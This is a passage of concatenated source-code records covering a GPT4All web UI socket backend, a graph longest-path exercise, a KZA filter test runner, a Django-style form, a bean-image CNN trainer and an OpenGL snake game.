populate it with tables\n self.db.populate()\n\n # This is used to keep track of messages \n self.full_message_list = []\n \n # =========================================================================================\n # Socket IO stuff \n # =========================================================================================\n @socketio.on('connect')\n def connect():\n print('Client connected')\n\n @socketio.on('disconnect')\n def disconnect():\n print('Client disconnected')\n\n @socketio.on('install_model')\n def 
install_model(data):\n def install_model_():\n print(\"Install model triggered\")\n model_path = data[\"path\"]\n progress = 0\n installation_dir = Path(f'./models/{self.config[\"backend\"]}/')\n filename = Path(model_path).name\n installation_path = installation_dir / filename\n print(\"Model install requested\")\n print(f\"Model path : {model_path}\")\n\n if installation_path.exists():\n print(\"Error: Model already exists\")\n socketio.emit('install_progress',{'status': 'failed', 'error': 'model already exists'})\n return\n \n socketio.emit('install_progress',{'status': 'progress', 'progress': progress})\n \n def callback(progress):\n socketio.emit('install_progress',{'status': 'progress', 'progress': progress})\n \n self.download_file(model_path, installation_path, callback)\n socketio.emit('install_progress',{'status': 'succeeded', 'error': ''})\n tpe = threading.Thread(target=install_model_, args=())\n tpe.start()\n \n \n @socketio.on('uninstall_model')\n def uninstall_model(data):\n model_path = data['path']\n installation_dir = Path(f'./models/{self.config[\"backend\"]}/')\n filename = Path(model_path).name\n installation_path = installation_dir / filename\n\n if not installation_path.exists():\n socketio.emit('install_progress',{'status': 'failed', 'error': 'The model does not exist'})\n return\n\n installation_path.unlink()\n socketio.emit('install_progress',{'status': 'succeeded', 'error': ''})\n \n\n \n @socketio.on('generate_msg')\n def generate_msg(data):\n if self.process.model_ready.value==1:\n if self.current_discussion is None:\n if self.db.does_last_discussion_have_messages():\n self.current_discussion = self.db.create_discussion()\n else:\n self.current_discussion = self.db.load_last_discussion()\n\n message = data[\"prompt\"]\n message_id = self.current_discussion.add_message(\n \"user\", message, parent=self.message_id\n )\n\n self.current_user_message_id = message_id\n tpe = threading.Thread(target=self.start_message_generation, args=(message, message_id))\n tpe.start()\n else:\n self.socketio.emit('infos',\n {\n \"status\":'model_not_ready',\n \"type\": \"input_message_infos\",\n 'logo': \"\",\n \"bot\": self.personality.name,\n \"user\": self.personality.user_name,\n \"message\":\"\",\n \"user_message_id\": self.current_user_message_id,\n \"ai_message_id\": self.current_ai_message_id,\n }\n )\n\n @socketio.on('generate_msg_from')\n def handle_connection(data):\n message_id = int(data['id'])\n message = data[\"prompt\"]\n self.current_user_message_id = message_id\n tpe = threading.Thread(target=self.start_message_generation, args=(message, message_id))\n tpe.start()\n # generation status\n self.generating=False\n self.process.start()\n\n\n #properties\n @property\n def message_id(self):\n return self._message_id\n\n @property\n def current_user_message_id(self):\n return self._current_user_message_id\n @current_user_message_id.setter\n def current_user_message_id(self, id):\n self._current_user_message_id=id\n self._message_id = id\n @property\n def current_ai_message_id(self):\n return self._current_ai_message_id\n @current_ai_message_id.setter\n def current_ai_message_id(self, id):\n self._current_ai_message_id=id\n self._message_id = id\n\n\n def download_file(self, url, installation_path, callback=None):\n \"\"\"\n Downloads a file from a URL, reports the download progress using a callback function, and displays a progress bar.\n\n Args:\n url (str): The URL of the file to download.\n installation_path (str): The path where the file should be saved.\n callback (function, 
optional): A callback function to be called during the download\n with the progress percentage as an argument. Defaults to None.\n \"\"\"\n try:\n response = requests.get(url, stream=True)\n\n # Get the file size from the response headers\n total_size = int(response.headers.get('content-length', 0))\n\n with open(installation_path, 'wb') as file:\n downloaded_size = 0\n with tqdm(total=total_size, unit='B', unit_scale=True, ncols=80) as progress_bar:\n for chunk in response.iter_content(chunk_size=8192):\n if chunk:\n file.write(chunk)\n downloaded_size += len(chunk)\n if callback is not None:\n percentage = (downloaded_size / total_size) * 100\n callback(percentage)\n progress_bar.update(len(chunk))\n\n if callback is not None:\n callback(100.0)\n\n print(\"File downloaded successfully\")\n except Exception as e:\n print(\"Couldn't download file:\", str(e))\n\n\n \n def condition_chatbot(self):\n if self.current_discussion is None:\n self.current_discussion = self.db.load_last_discussion()\n \n if self.personality.welcome_message!=\"\":\n message_id = self.current_discussion.add_message(\n self.personality.name, self.personality.welcome_message, \n DiscussionsDB.MSG_TYPE_NORMAL,\n 0,\n -1\n )\n \n self.current_ai_message_id = message_id\n else:\n message_id = 0\n return message_id\n\n def prepare_reception(self):\n self.bot_says = \"\"\n self.full_text = \"\"\n self.is_bot_text_started = False\n\n def create_new_discussion(self, title):\n self.current_discussion = self.db.create_discussion(title)\n # Get the current timestamp\n timestamp = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # Chatbot conditioning\n self.condition_chatbot()\n return timestamp\n\n def prepare_query(self, message_id=-1):\n messages = self.current_discussion.get_messages()\n self.full_message_list = []\n for message in messages:\n if message[\"id\"]< message_id or message_id==-1: \n if message[\"type\"]==self.db.MSG_TYPE_NORMAL:\n if message[\"sender\"]==self.personality.name:\n self.full_message_list.append(self.personality.ai_message_prefix+message[\"content\"])\n else:\n self.full_message_list.append(self.personality.user_message_prefix + message[\"content\"])\n else:\n break\n\n if self.personality.processor is not None:\n preprocessed_prompt = self.personality.processor.process_model_input(message[\"content\"])\n else:\n preprocessed_prompt = message[\"content\"]\n if preprocessed_prompt is not None:\n self.full_message_list.append(self.personality.user_message_prefix+preprocessed_prompt+self.personality.link_text+self.personality.ai_message_prefix)\n else:\n self.full_message_list.append(self.personality.user_message_prefix+message[\"content\"]+self.personality.link_text+self.personality.ai_message_prefix)\n\n\n link_text = self.personality.link_text\n\n if len(self.full_message_list) > self.config[\"nb_messages_to_remember\"]:\n discussion_messages = self.personality.personality_conditioning+ link_text.join(self.full_message_list[-self.config[\"nb_messages_to_remember\"]:])\n else:\n discussion_messages = self.personality.personality_conditioning+ link_text.join(self.full_message_list)\n \n return discussion_messages, message[\"content\"]\n\n def get_discussion_to(self, message_id=-1):\n messages = self.current_discussion.get_messages()\n self.full_message_list = []\n for message in messages:\n if message[\"id\"]<= message_id or message_id==-1: \n if message[\"type\"]!=self.db.MSG_TYPE_CONDITIONNING:\n if message[\"sender\"]==self.personality.name:\n 
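# Replay each prior turn with its speaker prefix so the model can tell who said what.\n 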
self.full_message_list.append(self.personality.ai_message_prefix+message[\"content\"])\n else:\n self.full_message_list.append(self.personality.user_message_prefix + message[\"content\"])\n\n link_text = self.personality.link_text\n\n if len(self.full_message_list) > self.config[\"nb_messages_to_remember\"]:\n discussion_messages = self.personality.personality_conditioning+ link_text.join(self.full_message_list[-self.config[\"nb_messages_to_remember\"]:])\n else:\n discussion_messages = self.personality.personality_conditioning+ link_text.join(self.full_message_list)\n \n return discussion_messages # Removes the last return\n\n\n def remove_text_from_string(self, string, text_to_find):\n \"\"\"\n Removes everything from the first occurrence of the specified text in the string (case-insensitive).\n\n Parameters:\n string (str): The original string.\n text_to_find (str): The text to find in the string.\n\n Returns:\n str: The updated string.\n \"\"\"\n index = string.lower().find(text_to_find.lower())\n\n if index != -1:\n string = string[:index]\n\n return string\n\n def process_chunk(self, chunk):\n print(chunk,end=\"\", flush=True)\n self.bot_says += chunk\n if not self.personality.detect_antiprompt(self.bot_says):\n self.socketio.emit('message', {\n 'data': self.bot_says, \n 'user_message_id':self.current_user_message_id, \n 'ai_message_id':self.current_ai_message_id, \n 'discussion_id':self.current_discussion.discussion_id\n }\n )\n if self.cancel_gen:\n print(\"Generation canceled\")\n self.process.cancel_generation()\n self.cancel_gen = False\n else:\n self.bot_says = self.remove_text_from_string(self.bot_says, self.personality.user_message_prefix.strip())\n self.process.cancel_generation()\n print(\"The model is hallucinating\")\n \n def start_message_generation(self, message, message_id):\n bot_says = \"\"\n\n # send the message to the bot\n print(f\"Received message : {message}\")\n if self.current_discussion:\n # First we need to send the new message ID to the client\n self.current_ai_message_id = self.current_discussion.add_message(\n self.personality.name, \"\", parent = self.current_user_message_id\n ) # first the content is empty, but we'll fill it at the end\n self.socketio.emit('infos',\n {\n \"status\":'generation_started',\n \"type\": \"input_message_infos\",\n \"bot\": self.personality.name,\n \"user\": self.personality.user_name,\n \"message\":message,#markdown.markdown(message),\n \"user_message_id\": self.current_user_message_id,\n \"ai_message_id\": self.current_ai_message_id,\n }\n )\n\n # prepare query and reception\n self.discussion_messages, self.current_message = self.prepare_query(message_id)\n self.prepare_reception()\n self.generating = True\n print(\">Generating message\")\n self.process.generate(self.discussion_messages, self.current_message, message_id, n_predict = self.config['n_predict'])\n self.process.started_queue.get()\n while(self.process.is_generating.value): # Simulating other commands being issued\n chunk = \"\"\n while not self.process.generation_queue.empty():\n chk, tok, message_type = self.process.generation_queue.get()\n chunk += chk\n if chunk!=\"\":\n self.process_chunk(chunk)\n\n print()\n print(\"## Done ##\")\n print()\n\n # Send final message\n self.socketio.emit('final', {\n 'data': self.bot_says, \n 'ai_message_id':self.current_ai_message_id, \n 'parent':self.current_user_message_id, 'discussion_id':self.current_discussion.discussion_id\n }\n )\n\n self.current_discussion.update_message(self.current_ai_message_id, self.bot_says)\n 
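# Persist the completed answer into the discussion DB and keep it in the rolling context.\n 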
self.full_message_list.append(self.bot_says)\n self.cancel_gen = False \n return bot_says\n else:\n #No discussion available\n print(\"No discussion selected!!!\")\n print(\"## Done ##\")\n print()\n self.cancel_gen = False\n return \"\"\n ","repo_name":"ParisNeo/Gpt4All-webui","sub_path":"gpt4all_api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":31488,"program_lang":"python","lang":"en","doc_type":"code","stars":158,"dataset":"github-code","pt":"21"} +{"seq_id":"20907915105","text":"import sys\nimport heapq\nfrom collections import deque\n\nn = int(input())\nm = int(input())\n\nind =[0]*(n+1)\nlinks = [[]for _ in range(n+1)]\ntotal_cost = [0]*(n+1)\ntotal_count = [0]*(n+1)\n\nfor i in range(m):\n start, end, cost = map(int,sys.stdin.readline().split())\n links[start].append([cost*-1,end])\n ind[end] += 1\n\nstart,end = map(int,sys.stdin.readline().split())\n\nq = [[0,start]]\n\nwhile q :\n now = heapq.heappop(q)\n now_cost = now[0]\n now_location = now[1]\n\n for i in links[now_location]:\n next_cost = now_cost + i[0]\n next_location = i[1]\n\n if total_cost[next_location] >= next_cost :\n total_cost[next_location] = next_cost\n \n a = (next_cost,next_location)\n heapq.heappush(q,a)\n\nend_cost = total_cost[end]\n\nprint(total_cost[end] * -1)\n\n\ndef back(n,co,backlist):\n for i in links[n]:\n # Each entry is [negated_cost, node]; costs are stored negated, so a\n # longer path means a smaller (more negative) running sum.\n if i[0]+co < end_cost:\n continue \n elif i[0]+co == end_cost:\n backlist.append(i[1])\n total_list.append(backlist)\n backlist.pop()\n continue\n else:\n backlist.append(i[1])\n back(i[1],i[0]+co,backlist)\n backlist.pop()\n\ntlist =[1]\ntotal_list =[]\nback(1,0,tlist)\nprint(tlist)\n# print(total_passed)\n# total_passed = set(total_passed)\n# sort_passed = []\n# for i in total_passed:\n# b = str(i)\n# for j in range(len(b)-1):\n# sort_passed.append(b[j]+b[j+1])\n\n# print(len(set(sort_passed)))","repo_name":"Suyeon-B/week03_team","sub_path":"dd0114/23_1948_임계경로 copy 2.py","file_name":"23_1948_임계경로 copy 2.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5037084493","text":"from os import listdir, getcwd\nfrom os.path import isfile, join\nimport ctypes as ct\nimport numpy as np\n\ndef get_dynamic_lib(path):\n libkza_path = path + \"/libkza.so\"\n libkza = ct.CDLL(libkza_path)\n return libkza\n\ndef get_kz_func(libkza):\n libkza.kz.argtypes = [\n ct.POINTER(ct.c_double), \n ct.c_int, \n ct.POINTER(ct.c_int), \n ct.POINTER(ct.c_int), \n ct.c_int\n ]\n libkza.kz.restype = ct.POINTER(ct.c_double)\n return libkza.kz\n\ndef get_kza_func(libkza):\n libkza.kza.argtypes = [\n ct.POINTER(ct.c_double), \n ct.c_int, \n ct.POINTER(ct.c_int), \n ct.POINTER(ct.c_double), \n ct.POINTER(ct.c_int), \n ct.c_int,\n ct.c_double,\n ct.c_double\n ]\n libkza.kza.restype = ct.POINTER(ct.c_double)\n\n libkza.kza_free.argtypes = [ct.POINTER(ct.c_double)]\n libkza.kza_free.restype = None\n return libkza.kza\n\ndef get_kza_free_func(libkza):\n libkza.kza_free.argtypes = [ct.POINTER(ct.c_double)]\n libkza.kza_free.restype = None\n return libkza.kza_free\n\ndef get_input_files(path):\n input_files = []\n for f in listdir(path):\n if isfile(join(path, f)):\n file_suffixes = f.split('.')\n if len(file_suffixes) > 1:\n data_type = file_suffixes[1]\n if data_type == \"in\":\n input_files.append(f)\n return input_files\n\ndef kz1d(x, m, k, kz, kza_free):\n xp = (ct.c_double * len(x))(*x)\n dim = 1\n size = (ct.c_int)(len(x))\n window = (ct.c_int)(m)\n res = kz(xp, dim, ct.byref(size), ct.byref(window), k)\n 
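# Copy the smoothed series out of the C-owned buffer before it is freed below.\n 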
ans = res[:len(x)]\n kza_free(res)\n return ans\n\ndef kza1d(x, m, k, kza, kz, kza_free):\n min_size = 10\n tol = 1.0e-5\n y = kz1d(x, m, k, kz, kza_free) \n xp = (ct.c_double * len(x))(*x)\n yp = (ct.c_double * len(y))(*y)\n dim = 1\n size = (ct.c_int)(len(x))\n window = (ct.c_int)(m)\n res = kza(xp, dim, ct.byref(size), yp, ct.byref(window), k, min_size, tol)\n ans = res[:len(x)]\n kza_free(res)\n return ans\n\ndef run_func_tests(func_name, path, funcs):\n tests_path = join(path, func_name + '/')\n input_files = get_input_files(tests_path)\n\n kz = funcs[\"kz\"]\n kza = funcs[\"kza\"]\n kza_free = funcs[\"kza_free\"]\n\n for f in input_files:\n file_name = f.split('.')[0]\n\n x = np.loadtxt(join(tests_path, f))\n ans = np.loadtxt(join(tests_path, file_name + '.out'))\n res = None \n\n if func_name == \"kz1d\":\n win_size = 30\n iterations = 3\n res = kz1d(x, win_size, iterations, kz, kza_free)\n elif func_name == \"kza1d\":\n win_size = 365\n iterations = 3\n res = kza1d(x, win_size, iterations, kza, kz, kza_free)\n\n if not np.allclose(res, ans):\n diff = res - ans\n print(diff)\n print(f\"test [{func_name}/{file_name}] failed\")\n \n\ndef main():\n script_path = getcwd()\n\n funcs = {\n \"kz\": None,\n \"kza\": None,\n \"kza_free\": None\n }\n\n libkza = get_dynamic_lib(script_path)\n funcs[\"kz\"] = get_kz_func(libkza)\n funcs[\"kza\"] = get_kza_func(libkza)\n funcs[\"kza_free\"] = get_kza_free_func(libkza)\n\n tests_path = join(script_path, 'tests/')\n run_func_tests(\"kz1d\", tests_path, funcs)\n run_func_tests(\"kza1d\", tests_path, funcs)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jakosv/kza","sub_path":"run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"33787460344","text":"# -*- coding: utf-8 -*-\n\n\nfrom entrenamiento.views.form import ModelForm\n\nclass ArcoForm(ModelForm):\n ''' Has all the columns that correspond to both recurve\n and compound bows.\n '''\n\n def __init__(self, model_class, object_id=None):\n super(ArcoForm, self).__init__(model_class,\n ['tipo_arco', 'id_usuario'],\n object_id)\n\n\n\nclass ArcoRecurvadoForm(ArcoForm):\n\n def __init__(self, model_class, object_id=None):\n super(ArcoRecurvadoForm, self).__init__(model_class,\n object_id)\n\n","repo_name":"tzulberti/entrenamiento-arqueria","sub_path":"entrenamiento/views/arcos/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14797687791","text":"## Utils\n\nfrom datasets import load_dataset, Image\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom torchvision.transforms import Compose, ColorJitter, ToTensor, Resize, RandomHorizontalFlip, RandomVerticalFlip, RandomRotation, RandomAffine\nfrom torch.utils.data import Dataset, DataLoader\nimport torch.nn.functional as F\nimport torch\nfrom time import time\nimport torch.utils.tensorboard as tb\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nimport torchvision.transforms\nfrom torch import save\nfrom os import path\n\nclass MyDataset(Dataset):\n def __init__(self, data_path, train=True):\n\n if train:\n self.dataset = load_dataset(\"imagefolder\", data_dir=data_path, drop_labels=False, split=\"train\")\n self.dataset = self.dataset.map(self.img_resize, remove_columns=[\"image\"], batched=True)\n 
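# set_transform applies the random augmentations lazily on each access, so every epoch sees fresh flips/rotations instead of a cached copy.\n 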
self.dataset.set_transform(self.transforms)\n else:\n self.dataset = load_dataset(\"imagefolder\", data_dir=data_path, drop_labels=False, split=\"test\")\n self.dataset = self.dataset.map(self.img_resize, remove_columns=[\"image\"], batched=True)\n self.dataset.set_transform(self.test_transform)\n\n def transforms(self, imgs):\n augment = Compose([\n RandomHorizontalFlip(p=0.5), \n RandomVerticalFlip(p=0.5),\n ColorJitter(brightness=0.1,\n contrast=0.1,\n saturation=0.1,\n hue=0),\n RandomRotation(degrees=45),\n RandomAffine(degrees=10),\n ToTensor()\n ])\n imgs[\"pixel_values\"] = [augment(image) for image in imgs[\"pixel_values\"]]\n return imgs\n\n def test_transform(self, imgs):\n augment = Compose([ToTensor()])\n imgs[\"pixel_values\"] = [augment(image) for image in imgs[\"pixel_values\"]]\n return imgs\n\n def img_resize(self, imgs):\n imgs[\"pixel_values\"] = [image.convert(\"RGB\").resize((100,100)) for image in imgs[\"image\"]]\n return imgs\n\n def __getitem__(self, index):\n data = self.dataset[index]\n label = F.one_hot(torch.tensor(data[\"label\"]), num_classes=3)\n return data[\"pixel_values\"], label.float()\n\n def __len__(self):\n return len(self.dataset)\n#bean_data_train = MyDataset(\"../../beans\",train)\n\n#img = bean_data_train[0][\"pixel_values\"]\n#plt.imshow(np.transpose(img, (1,2,0)))\n\n\n#type(bean_data_train)\n\n## Build the Model\n\n\n\"\"\"\nCNN class\n - Can take layers argument to define number of channels and depth\n - Number of input channels will always be 3\n - Currently the first layer is hardcoded with kernel size 7, and stride 2\n I think this should be reduced to 5 or even 3.\n - The class Block defines a block of 2 conv layers. This could be extended to 3\n and include a skip. Could also include params for kernal size and striding\n - Normalization is performed here instead of in Utils \n\"\"\"\n\nclass ConvoClassifier(torch.nn.Module):\n\n class Block(torch.nn.Module):\n def __init__(self, n_input, n_output, stride=1):\n super().__init__()\n\n # Defines a two layer block with stride in first layer only, batch norm after each\n self.net = torch.nn.Sequential(\n # Only the first layer is strided, can adjust this in the loop in the init method\n torch.nn.Conv2d(n_input, n_output, kernel_size=3,\n padding=1, stride=stride),\n torch.nn.ReLU(),\n torch.nn.Conv2d(n_output, n_output, kernel_size=3, padding=1),\n torch.nn.BatchNorm2d(n_output),\n torch.nn.ReLU()\n )\n\n def forward(self, x):\n return self.net(x)\n\n def __init__(self, layers=[32, 64, 128], n_input_channels=3, n_classes=3):\n super().__init__()\n # Inital layer with kernal size 7, the max pool appears to increase accuracy on validation set\n L = [torch.nn.Conv2d(n_input_channels, layers[0], kernel_size=7, padding=3, stride=2),\n torch.nn.ReLU(), torch.nn.MaxPool2d(kernel_size=3, stride=2, padding=1)]\n c = layers[0]\n # Build network from list of layers\n for l in layers:\n # can adjust stride here\n L.append(self.Block(c, l, stride=2))\n c = l\n\n self.network = torch.nn.Sequential(*L)\n # Linear layer at end for the 3 classification labels\n self.classifier = torch.nn.Linear(c, n_classes)\n # Mean and standard dev of color channels accross the entire training set\n self.norm = torchvision.transforms.Normalize(\n mean=[0.233, 0.298, 0.256], std=[0.199, 0.118, 0.201])\n\n def forward(self, x):\n # Normalize\n normx = self.norm(x)\n # Compute the features\n z = self.network(normx)\n # Global average pooling\n z = z.mean(dim=[2, 3])\n # Classify\n return self.classifier(z)\n\n# Save the model 
with epoch number and message/name of model (for checkpoints)\ndef save_model(model, message, epoch):\n    name = message + '_' + str(epoch) + '_' + 'det.th'\n    from torch import save\n    from os import path\n    return save(model.state_dict(), path.join(path.dirname(path.abspath(__file__)), name))\n\ndef load_model(model_name):\n    from torch import load\n    from os import path\n    r = ConvoClassifier()\n    r.load_state_dict(load(path.join(path.dirname(\n        path.abspath(__file__)), model_name), map_location='cpu'))\n    return r\n\n\n\n\n## Train the Model\n\n#from .models import ConvoClassifier, save_model, load_model\n#from .utils import MyDataset\n\n\"\"\"\nRunning tensorboard\n - launch terminal w/deeplearning virtual env\n - run python -m tensorboard.main --logdir=runs\n - open in browser\n - enables visualization of training loss and accuracy after each batch\n and validation accuracy after each epoch\n\"\"\"\n\n\"\"\"\nMain training loop\n - Takes training arguments\n    - log_dir: directory of logs for tensorboard\n    - run_info: short description of run for identification in tensorboard\n    - lr: learning rate\n    - ep: number of epochs\n    - layers: takes multiple int values and constructs a list used for construction of model. \n      Each number is number of channels and length of list is number of layers\n\n - Prints time and validation accuracy to console after each epoch. Saves model at end\n - Note: each \"layer\" is a block of 2 convolutional layers, see models.py\n - Should add ability to customize learning rate schedule, currently decaying around \n   6 epochs gives good results \n\"\"\"\n\ndef load_data(dataset_path, num_workers=0, batch_size=256, train=True):\n    dataset = MyDataset(dataset_path, train)\n    return DataLoader(dataset, num_workers=num_workers, batch_size=batch_size, shuffle=True, drop_last=True)\n\ndef train(args):\n\n    start = time()\n    # model constructed here\n    model = ConvoClassifier(args.layer_list, n_classes=args.num_classes).to(device)\n\n    # set up logger with the run info name\n    train_logger, valid_logger = None, None\n    if args.log_dir is not None:\n        train_dir = \"train\" + args.run_info\n        valid_dir = \"valid\" + args.run_info\n        train_logger = tb.SummaryWriter(path.join(args.log_dir, train_dir))\n        valid_logger = tb.SummaryWriter(path.join(args.log_dir, valid_dir))\n\n    # Choice of optimizer, adam working better so far\n    # optimizer = torch.optim.SGD(model.parameters(), lr=0.001, momentum=0.9)\n    optimizer = torch.optim.Adam(model.parameters(), lr=args.learn_rate)\n\n    # LR scheduler, will want to eventually add ability to customize args for this\n    scheduler = torch.optim.lr_scheduler.StepLR(\n        optimizer, step_size=6, gamma=0.2)\n    step = 0\n\n\n    train_data = load_data(args.data_dir,0,args.batch_size,True)\n    val_data = load_data(args.data_dir,0,args.batch_size,False)\n\n    # Main loop\n    for epoch in range(args.num_epochs):\n        startepoch = time()\n        total_loss = 0\n\n        # Make sure things are set to training mode\n        model.train()\n        for i, (x, y) in enumerate(train_data):\n\n            x = x.to(device)\n            y = y.to(device)\n            output = model(x)\n            l = F.cross_entropy(output, y)\n            optimizer.zero_grad()\n            l.backward()\n            optimizer.step()\n            total_loss += l\n\n            # compute accuracy on training batch, need to get it back to CPU and change to numpy array\n            acc = (output.argmax(1).type_as(y) ==\n                   y.argmax(1)).float().detach().cpu().numpy()\n            acc = np.mean(acc)\n\n            train_logger.add_scalar(\"Loss\", l, global_step=step)\n            #train_logger.add_scalar(\"acc\", acc, global_step=step)\n            step += 1\n\n        # Test model on validation set after training 
epoch, make sure to set to eval mode\n model.eval()\n val_acc = np.array([])\n for i, (x, y) in enumerate(val_data):\n x = x.to(device)\n y = y.to(device)\n output = model(x)\n # compute accuracy on validation set, need to get it back to CPU and change to numpy array\n acc = (output.argmax(1).type_as(y) ==\n y.argmax(1)).float().detach().cpu().numpy()\n acc = np.mean(acc)\n val_acc = np.append(val_acc, acc)\n \n\n valid_logger.add_scalar(\n \"val_acc_epoch\", np.mean(val_acc), global_step=step)\n \n # End of epoch, print validation accurcy and epoch time\n endepoch = time()\n scheduler.step()\n print(np.mean(val_acc))\n print(\"epochtime\", endepoch-startepoch)\n\n # print total time of model and save\n end = time()\n print(\"total time\", end-start)\n save_model(model, args.run_info, args.num_epochs)\n\n\n\"\"\"\nArguments:\n - log_dir: directory of logs for tensorboard\n - run_info: short description of run for identification in tensorboard\n - lr: learning rate\n - ep: number of epochs\n - layers: takes multiple int values and constructs a list used for construction of model. \n Each number is number of channels and length of list is number of layers\n\"\"\"\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--log_dir', default='runs')\n parser.add_argument('-n', '--run_info', type=str)\n parser.add_argument('-lr', '--learn_rate', type=float, default=0.0001)\n parser.add_argument('-ep', '--num_epochs', type=int, default=4)\n # layer list requires at least one number. Multiple numbers seperated by a single space\n parser.add_argument('-layers', '--layer_list', nargs='+',\n type=int, default=[32, 64, 128])\n parser.add_argument('-data', '--data_dir', type=str, default='../../beans')\n parser.add_argument('-c', '--num_classes', type=int, default=3 )\n parser.add_argument('-bs', '--batch_size', type=int, default=256)\n\n args = parser.parse_args()\n train(args)\n","repo_name":"DavidHein96/davidhein96.github.io","sub_path":"posts/simple_conv/run_beans.py","file_name":"run_beans.py","file_ext":"py","file_size_in_byte":11091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31720563785","text":"import os\n\nimport numpy as np\nfrom OpenGL.GL import *\n\nimport lib.basic_shapes as bs\nimport lib.easy_shaders as es\nimport lib.transformations as tr\nimport lib.obj_handler as obj_reader\n\nfrom collections import deque\n\n\nclass Head():\n \n def __init__(self):\n self.x, self.y, self.z = 0.0, 0.0, -4.5\n self.theta = 0.0\n self.bend = 0.20\n self.front = 0.20\n self.turn = 0\n self.weirdLight = (1.0, 1.0, 1.0)\n self.transform = tr.matmul([tr.translate(self.x,self.y,self.z),tr.uniformScale(0.5),tr.rotationZ(self.theta)])\n \n def draw(self, objeto, pipeline, projection, view):\n glUseProgram(pipeline.shaderProgram)\n\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"La\"), 0.25*self.weirdLight[0], 0.25*self.weirdLight[1], 0.25*self.weirdLight[2])\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"Ld\"), 0.65*self.weirdLight[0], 0.65*self.weirdLight[1], 0.65*self.weirdLight[2])\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"Ls\"), 0.1*self.weirdLight[0], 0.1*self.weirdLight[1], 0.1*self.weirdLight[2])\n\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"Ka\"), 0.25, 0.25, 0.25)\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"Kd\"), 0.6, 0.6, 0.6)\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"Ks\"), 1.0, 
1.0, 1.0)\n\n\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"lightPosition\"), 0, 0, 50)\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"viewPosition\"), self.x,self.y,self.z)\n glUniform1ui(glGetUniformLocation(pipeline.shaderProgram, \"shininess\"), 100)\n glUniform1f(glGetUniformLocation(pipeline.shaderProgram, \"constantAttenuation\"), 0.001)\n glUniform1f(glGetUniformLocation(pipeline.shaderProgram, \"linearAttenuation\"), 0.0001)\n glUniform1f(glGetUniformLocation(pipeline.shaderProgram, \"quadraticAttenuation\"), 0.0001)\n\n glUniformMatrix4fv(glGetUniformLocation(pipeline.shaderProgram, \"model\"), 1, GL_TRUE, self.transform)\n glUniformMatrix4fv(glGetUniformLocation(pipeline.shaderProgram, \"projection\"), 1, GL_TRUE, projection)\n glUniformMatrix4fv(glGetUniformLocation(pipeline.shaderProgram, \"view\"), 1, GL_TRUE, view)\n pipeline.drawShape(objeto)\n\n def move(self):\n self.x += self.front*np.cos(self.theta)\n self.y += self.front*np.sin(self.theta)\n self.transform = tr.matmul([tr.translate(self.x,self.y,self.z),tr.uniformScale(0.5),tr.rotationZ(self.theta)])\n\n \n def update(self):\n self.theta += self.bend*self.turn\n\nclass Body():\n \n def __init__(self):\n self.x, self.y, self.z = 0.0, 0.0, -4.5\n self.theta = 0.0\n self.transform = tr.matmul([tr.translate(self.x,self.y,self.z),tr.uniformScale(0.5),tr.rotationZ(self.theta)])\n self.weirdLight = (1.0, 1.0, 1.0)\n \n def draw(self, objeto, pipeline, projection, view):\n glUseProgram(pipeline.shaderProgram)\n\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"La\"), 0.25*self.weirdLight[0], 0.25*self.weirdLight[1], 0.25*self.weirdLight[2])\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"Ld\"), 0.65*self.weirdLight[0], 0.65*self.weirdLight[1], 0.65*self.weirdLight[2])\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"Ls\"), 0.1*self.weirdLight[0], 0.1*self.weirdLight[1], 0.1*self.weirdLight[2])\n\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"Ka\"), 0.25, 0.25, 0.25)\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"Kd\"), 0.6, 0.6, 0.6)\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"Ks\"), 1.0, 1.0, 1.0)\n\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"lightPosition\"), 0, 0, 50)\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"viewPosition\"), self.x, self.y, self.z)\n glUniform1ui(glGetUniformLocation(pipeline.shaderProgram, \"shininess\"), 100)\n glUniform1f(glGetUniformLocation(pipeline.shaderProgram, \"constantAttenuation\"), 0.001)\n glUniform1f(glGetUniformLocation(pipeline.shaderProgram, \"linearAttenuation\"), 0.0001)\n glUniform1f(glGetUniformLocation(pipeline.shaderProgram, \"quadraticAttenuation\"), 0.0001)\n\n glUniformMatrix4fv(glGetUniformLocation(pipeline.shaderProgram, \"model\"), 1, GL_TRUE, self.transform)\n glUniformMatrix4fv(glGetUniformLocation(pipeline.shaderProgram, \"projection\"), 1, GL_TRUE, projection)\n glUniformMatrix4fv(glGetUniformLocation(pipeline.shaderProgram, \"view\"), 1, GL_TRUE, view)\n pipeline.drawShape(objeto)\n\n def move(self):\n self.transform = tr.matmul([tr.translate(self.x,self.y,self.z),tr.uniformScale(0.5),tr.rotationZ(self.theta)])\n \n\nclass Snake():\n \n def __init__(self):\n self.alive = True\n self.objective = None\n self.floor = None\n 